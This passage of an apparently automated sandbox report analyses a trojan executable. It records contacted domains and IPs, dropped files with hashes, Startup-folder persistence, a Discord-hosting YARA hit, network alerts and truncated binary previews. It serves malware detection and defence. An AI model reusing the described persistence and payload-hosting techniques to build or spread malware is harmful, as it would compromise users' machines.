                                                    http://www.founder.com.cn/cnsHesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.305585833.000000000B75F000.00000004.00000800.00020000.00000000.sdmp, Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.305495592.000000000B75E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.commHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.359046322.0000000000B37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.jiyu-kobo.co.jp/Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.galapagosdesign.com/DPleaseHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.zhongyicts.com.cno.Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.307075934.000000000B74A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://ns.adbjava.exe, 0000000F.00000003.379378801.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000001E.00000003.501286786.000000000C0AE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000001F.00000003.505943023.000000000C51E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers8Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.fonts.comHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.sandoll.co.krHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.urwpp.deDPleaseHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.zhongyicts.com.cnHesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.307075934.000000000B74A000.00000004.00000800.00020000.00000000.sdmp, Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.359212510.0000000002374000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000002.423805671.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000001E.00000002.575090256.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000001F.00000002.576422912.00000000030C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.carterandcone.como.Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.307075934.000000000B74A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.sakkal.comHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://ns.ado/1java.exe, 0000000F.00000003.382467142.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.382207686.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.386158306.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380733322.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.387385355.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.384274841.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.384539153.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.382536820.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381867295.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381223688.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.417649932.000000000C141000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.379916821.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381491238.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.379844890.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.379378801.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380331660.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.382125294.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380828460.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380258411.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.388095411.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381144325.000000000C14E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          212.123.41.108
                                                          		www.athletes4africa.bizGermany
                                                          		12915EPAG-ASDEfalse
                                                          162.159.129.233
                                                          		unknownUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          15.197.142.173
                                                          		aireapartmentsmsp.comUnited States
                                                          		7430TANDEMUSfalse
                                                          34.102.136.180
                                                          		sturgisbrews.comUnited States
                                                          		15169GOOGLEUSfalse
                                                          34.98.99.30
                                                          		navairahotels.clubUnited States
                                                          		15169GOOGLEUSfalse
                                                          162.159.135.233
                                                          		unknownUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          104.21.21.198
                                                          		www.feasible-weld.comUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          162.159.134.233
                                                          		cdn.discordapp.comUnited States
                                                          		13335CLOUDFLARENETUSfalse

                                                          Private

                                                          IP
                                                          192.168.2.1
                                                          127.0.0.1

                                                          General Information

                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                          Analysis ID:567552
                                                          Start date:07.02.2022
                                                          Start time:12:01:51
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 15m 49s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Sample file name:Hesab#U0131 Onaylay#U0131n (renamed file extension from none to exe)
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:40
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.adwa.expl.evad.winEXE@28/8@11/10
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HDC Information:
                                                          • Successful, ratio: 0.1% (good quality ratio 0.1%)
                                                          • Quality average: 64.8%
                                                          • Quality standard deviation: 13.9%
                                                          HCA Information:
                                                          • Successful, ratio: 93%
                                                          • Number of executed functions: 219
                                                          • Number of non-executed functions: 22
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Override analysis time to 240s for sample files taking high CPU consumption

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          12:03:19API Interceptor1x Sleep call for process: Hesab#U0131 Onaylay#U0131n.exe modified
                                                          12:03:49API Interceptor3x Sleep call for process: java.exe modified
                                                          12:04:02AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          No context

                                                          ASNs

                                                          No context

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Hesab#U0131 Onaylay#U0131n.exe.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1301
                                                          Entropy (8bit):5.345637324625647
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4VE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHA
                                                          MD5:DFD4408A208002D5E37FF1EE9FCA65F5
                                                          SHA1:4555863ADF3512FA17B93EAC7F28C224208AF341
                                                          SHA-256:587171651CAD23936552519CD3EBA52184B4FE64431FCF627DC71D831597E466
                                                          SHA-512:D164B281E0A1E3838D08D427881D9FBF2B4176319412CF58E7D503CE31FA8D49D007520AD3F6F25C9B70E83CCEDF5753AB9E964A3F3A2D95D9A21167E799248F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\java.exe.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\java.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1301
                                                          Entropy (8bit):5.345637324625647
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4VE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHA
                                                          MD5:DFD4408A208002D5E37FF1EE9FCA65F5
                                                          SHA1:4555863ADF3512FA17B93EAC7F28C224208AF341
                                                          SHA-256:587171651CAD23936552519CD3EBA52184B4FE64431FCF627DC71D831597E466
                                                          SHA-512:D164B281E0A1E3838D08D427881D9FBF2B4176319412CF58E7D503CE31FA8D49D007520AD3F6F25C9B70E83CCEDF5753AB9E964A3F3A2D95D9A21167E799248F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\java.exe
                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):42080
                                                          Entropy (8bit):6.2125074198825105
                                                          Encrypted:false
                                                          SSDEEP:384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
                                                          MD5:F2A47587431C466535F3C3D3427724BE
                                                          SHA1:90DF719241CE04828F0DD4D31D683F84790515FF
                                                          SHA-256:23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
                                                          SHA-512:E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..X...........w... ........@.. ...................................`.................................Hw..O....... ............f..`>...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................|w......H........#...Q...................u.......................................0..K........-..*..i....*...r...p.o....,....r...p.o....-..*.....o......o.....$...*.....o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o*....(+...o,.....&...(-....*.......3..@......R...s.....s....(....*:.(/.....}P...*J.{P....o0..

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):528896
                                                          Entropy (8bit):6.299751477424307
                                                          Encrypted:false
                                                          SSDEEP:12288:gwaVtPLkZky4dlMcVimSVLRfHA2IifosRuTsmah:gwaVtPLkp4dlMcVimEYqoFT
                                                          MD5:7600223383061FAB23F27E42C7CF74C6
                                                          SHA1:E67E679C0F9730E02451D13394B06AAB55E2B6E0
                                                          SHA-256:712D99F8FA44ABAD1C6E9395B8236C6A7A1247C767E51721445111A22568742C
                                                          SHA-512:8A2CA56A78B351750EE9B0330C3B76236E93DA7405108EE60002D8F6CC9B7A02B074B7FE5F5F6F2A736B34858FBF71914F87AF0ACAADDF2921BD11CE0D35A48B
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe, Author: Florian Roth
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 28%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....pL0..............P..............(... ...@....@.. ....................................`.................................4(..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p(......H.......pK...................D............................................( ...*&..(!....*.s"........s#........s$........s%........s&........*Z........o9...........*&..(:....*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*...{......,.+.....,.rq..ps?...z..|.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe:Zone.Identifier

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                          \Device\Null

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\PING.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):823
                                                          Entropy (8bit):4.849820620027152
                                                          Encrypted:false
                                                          SSDEEP:12:PKMRJpTeTeTeTeTeTeTeTeTeTeTeT0sQpAFSkIrxMVlmJHaVzvv:/JdAokItULVDv
                                                          MD5:0E44BA60948680C2D34F551973EDCCBE
                                                          SHA1:6C4D1FADDD2F3E06FD61FE16EC634FCD50A7CAA6
                                                          SHA-256:F16318E0221AAAE070E68CD2D022600F5C2A1501B24375F422B16796F31EA63D
                                                          SHA-512:9100F51E910AC6BC35AF242B63AD8472BFB190461F340C2CB33873D05462954716669932736C1594CF738F856D2F0717FFA7E0E5032F4308197E45E3535657AF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 12, Received = 12, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):6.299751477424307
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Windows Screen Saver (13104/52) 0.07%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          File name:Hesab#U0131 Onaylay#U0131n.exe
                                                          File size:528896
                                                          MD5:7600223383061fab23f27e42c7cf74c6
                                                          SHA1:e67e679c0f9730e02451d13394b06aab55e2b6e0
                                                          SHA256:712d99f8fa44abad1c6e9395b8236c6a7a1247c767e51721445111a22568742c
                                                          SHA512:8a2ca56a78b351750ee9b0330c3b76236e93da7405108ee60002d8f6cc9b7a02b074b7fe5f5f6f2a736b34858fbf71914f87af0acaaddf2921bd11ce0d35a48b
                                                          SSDEEP:12288:gwaVtPLkZky4dlMcVimSVLRfHA2IifosRuTsmah:gwaVtPLkp4dlMcVimEYqoFT
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....pL0..............P..............(... ...@....@.. ....................................`................................

                                                          File Icon

                                                          Icon Hash:00828e8e8686b000

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x48288e
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                          Time Stamp:0x304C70E1 [Tue Sep 5 15:46:41 1995 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:v4.0.30319
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x828340x57.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x840000x384.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000x808940x80a00False0.515030900753data6.3113145691IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x840000x3840x400False0.36328125data2.85086282557IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x860000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_VERSION0x840580x32cdata

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Version Infos

                                                          DescriptionData
                                                          Translation0x0000 0x04b0
                                                          LegalCopyrightCopyright 2017
                                                          Assembly Version1.0.0.0
                                                          InternalNameIHMS Final.exe
                                                          FileVersion1.0.0.0
                                                          CompanyName
                                                          LegalTrademarks
                                                          Comments
                                                          ProductNameIHMS Final
                                                          ProductVersion1.0.0.0
                                                          FileDescriptionIHMS Final
                                                          OriginalFilenameIHMS Final.exe

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          02/07/22-12:06:19.575987TCP1201ATTACK-RESPONSES 403 Forbidden804982234.98.99.30192.168.2.3
                                                          02/07/22-12:06:24.844215TCP1201ATTACK-RESPONSES 403 Forbidden804982315.197.142.173192.168.2.3
                                                          02/07/22-12:06:40.683562TCP1201ATTACK-RESPONSES 403 Forbidden804982634.102.136.180192.168.2.3

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Feb 7, 2022 12:02:45.802937031 CET49752443192.168.2.3162.159.134.233
                                                          Feb 7, 2022 12:02:45.803004026 CET44349752162.159.134.233192.168.2.3
